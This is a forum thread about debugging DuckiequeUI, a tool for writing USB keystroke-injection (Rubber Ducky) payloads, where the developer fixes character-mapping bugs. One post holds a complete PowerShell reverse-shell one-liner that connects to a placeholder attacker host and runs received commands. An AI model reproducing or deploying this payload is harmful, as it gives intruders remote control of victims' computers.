kdodge Posted March 28, 2021 Share Posted March 28, 2021 [deleted] Link to comment Share on other sites More sharing options...
Scout Posted April 7, 2021 Share Posted April 7, 2021 Hey I am using the tool now, but I am seeing an odd issue. My payload is using "=" but they are being typed as "+" Do you know what might be causing this? Link to comment Share on other sites More sharing options...
chrizree Posted April 7, 2021 Share Posted April 7, 2021 What language is your "victim" using and what language have you specified when creating the inject.bin file? What's the result if you use the payload ducky code and encode it with an official tool, same thing? Link to comment Share on other sites More sharing options...
Scout Posted April 7, 2021 Share Posted April 7, 2021 The language is set to default, but I also set it to US. I don't think it's an issue with the Duckyscript, rather how the DuckiequeUI tool is handeling the "=." I was poking around the source code and I guess there is a tricky thing around the Windows API and the "=." The author listed a TODO around having to figure out how to get around this issue. I am not strong enough with Windows APIs or CPP to even begin to help with a solution though. Link to comment Share on other sites More sharing options...
chrizree Posted April 7, 2021 Share Posted April 7, 2021 it's nothing I will spend any time on either, I'm perfectly OK with using an ordinary text editor and the official tools in order to create ducky payload scripts and encoded files Link to comment Share on other sites More sharing options...
Scout Posted April 8, 2021 Share Posted April 8, 2021 18 hours ago, chrizree said: it's nothing I will spend any time on either, I'm perfectly OK with using an ordinary text editor and the official tools in order to create ducky payload scripts and encoded files If you read my original post then you know that I was looking for another workflow, and that I was unhappy with debugging using official tools. DuckiequeUI seemed to fit my needs perfectly, which is why I was so invested in resolving this bug. 13 hours ago, kdodge said: I have fixed the problem of + for =. Thank you for discovering it! You are awesome! I am going to try downloading this and working with it today. I will report back. Are you planning up update the repo with a new release? Otherwise I will compile it myself. Link to comment Share on other sites More sharing options...
Scout Posted April 8, 2021 Share Posted April 8, 2021 1 minute ago, Scout said: Are you planning up update the repo with a new release? Otherwise I will compile it myself. Scratch that, you already did. And it is working! Thanks again for this great tool and being so quick to fix it. Link to comment Share on other sites More sharing options...
Scout Posted April 8, 2021 Share Posted April 8, 2021 Hey so I found one more bug--it looks like on Windows it doesn't like the "|" and renders just a "?". I also found that when I script "\" it is typed out as a "/". This is interesting because both symbols are on the same button on my keyboard. For reference, I am trying to run the following simple one-liner reverse shell PowerShell payload: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attackerIP',attackerPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" Again, sorry I can't help to contribute, but I will sure be a tester! Ha! Link to comment Share on other sites More sharing options...
Scout Posted April 12, 2021 Share Posted April 12, 2021 On 4/8/2021 at 3:11 PM, kdodge said: Yep, I got the slash and backslash keys reversed. Thank you. New version is up Rad--and I like the new sidebar! That's nice for quickly adding common actions. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.